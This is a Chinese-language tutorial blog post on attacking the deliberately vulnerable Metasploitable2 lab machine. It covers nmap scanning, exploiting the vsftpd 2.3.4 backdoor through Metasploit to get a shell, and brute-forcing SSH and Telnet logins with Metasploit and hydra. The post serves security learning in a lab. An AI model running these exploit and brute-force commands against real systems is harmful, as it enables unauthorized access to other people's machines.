metasploitable2 渗透测试靶机 1

Metasploitable 2靶机介绍

Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全

靶机下载地址

Metasploitable - Browse /Metasploitable2 at SourceForge.net

下载之后用vmware打开即可,网卡要和攻击机在同一网段,可以全部桥接,也可以全部NAT

信息收集

首先,打开靶机之后,是不知道靶机的ip地址的,大家可以在kali机输入命令ip a 看一下自己的网段

利用nmap扫描整个网段看一下

nmap -sP -T4 网段

-sS           //SYN扫描(不容易被发现)
-sT           //TCP扫描
-sP           //ping扫描
-sU           //UDP扫描
-sV           //探测端口服务版本
-Pn           //扫描之前不需要⽤ping命令,防⽕墙禁⽌ping命令时可以使用
-v           //显⽰扫描过程,推荐使⽤
-p //指定端口 如-p 80    -p 1-65535   -p 21,80,443,445   -p-(扫描65535个端口)
open|filtered(开放或者过滤的))端口

kali机为192.168.130.128    靶机为192.168.130.137

 那我们首先扫描一下靶机开放的端口

扫描二维码关注公众号,回复: 14710948 查看本文章

vsftpd2.3.4 笑脸后门

先看第一个,21端口 vsftpd2.3.4版本,查了一下百度,这个版本存在一个后门

如果遇到其他版本也可以暴力破解

vsftpd 2.3.4版本中,在登录输入用户名时输入:)类似于笑脸的符号,会导致服务处理开启6200后门端口,直接执行系统命令

打开msf 搜索一下

msfconsole       //打开msf

search 关键词  //搜索

 里面已经有exp了,我们直接使用它进行攻击

use exploit/unix/ftp/vsftpd_234_backdoor 

 我们只需要设置一下ip地址就行了,当然如果你扫描得服务在其他端口,还需要修改一下端口

set  rhost  ip地址
set rport  端口
run

成功拿下shell

ssh服务爆破 

听见这个服务第一时间就可以想到弱口令,爆破

我们可以用到得工具有hydra(九头蛇),msf等等工具进行爆破

search ssh login        //先搜索一下

use  auxiliary/scanner/ssh/ssh_login      //这里我们用这个

 show options         查看配置

msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.130.137

rhosts => 192.168.130.137       设置ip
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /user
user_file => /user                       用户名字典
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /pass
pass_file => /pass                      密码字典

msf6 auxiliary(scanner/ssh/ssh_login) > set threads 100
threads => 100                           线程

 

 成功爆破出用户名、密码    都是msfadmin

Telnet 爆破

telnet第一时间想到得也是爆破

这次我们用hydra来试一下

hydra -L /user -P /pass -vV -o /1 192.168.130.137 telnet
常用参数 

-l 指定用户名
-L 用户名字典
-p 指定密码
P 密码字典
-v 显示详细信息
-o 保存爆破时得记录

猜你喜欢

转载自blog.csdn.net/m0_73910867/article/details/127262969